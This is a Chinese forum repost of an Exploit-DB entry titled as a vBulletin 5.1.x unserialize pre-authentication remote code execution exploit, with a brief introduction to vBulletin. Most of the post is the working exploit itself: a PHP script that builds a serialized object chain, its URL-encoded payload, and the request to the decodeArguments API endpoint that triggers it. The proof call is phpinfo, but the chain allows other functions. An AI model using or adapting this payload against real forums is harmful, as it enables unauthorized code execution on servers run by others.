Moke|墨客

 找回密码
 立即注册
搜索
查看: 7613|回复: 0

最新vBulletin?5.1.x?–?预授权远程代码执行漏洞

[复制链接]

3636

主题

0

回帖

3681

积分

超级版主

Rank: 8Rank: 8

积分
3681
发表于 2016-5-9 14:17:50 | 显示全部楼层 |阅读模式



   

  0x00vBulletin
  vBulletin 是世界上用户非常广泛的PHP论坛,很多大型论坛都选择vBulletin作为自己的社区,很多大型网站,比如蜂鸟网,51团购,海洋部落,EA,STEAM等。
  0x01Exploit
  Download Exploit: Source
# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit  
# Date: Nov 4th, 2015  
# Exploit Author: hhjj  
# Vendor Homepage: http://www.vbulletin.com/  
# Version: 5.1.x  
# Tested on: Debian  
# CVE :  
# I did not discover this exploit, leaked from the IoT.  
# Build the object  
php <<'eof'  
<?php
class vB_Database {  
public $functions =array();  
public function __construct()  
{  
$this->functions['free_result']='phpinfo';  
}  
}  
class vB_dB_Result {  
protected $db;  
protected $recordset;  
public function __construct()  
{  
$this->db =new vB_Database();  
$this->recordset =1;  
}  
}  
print urlencode(serialize(new vB_dB_Result())) . "\n";  
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
#Then hit decodeArguments with your payload :  
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
赞 1分享  
本文参考/转载自:https://www.exploit-db.com/exploits/38629/
本文链接地址:最新vBulletin 5.1.x – 预授权远程代码执行漏洞 , 转载请保留本说明!    一个走在路上渴望进步的青年......
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

 

 

快速回复 返回顶部 返回列表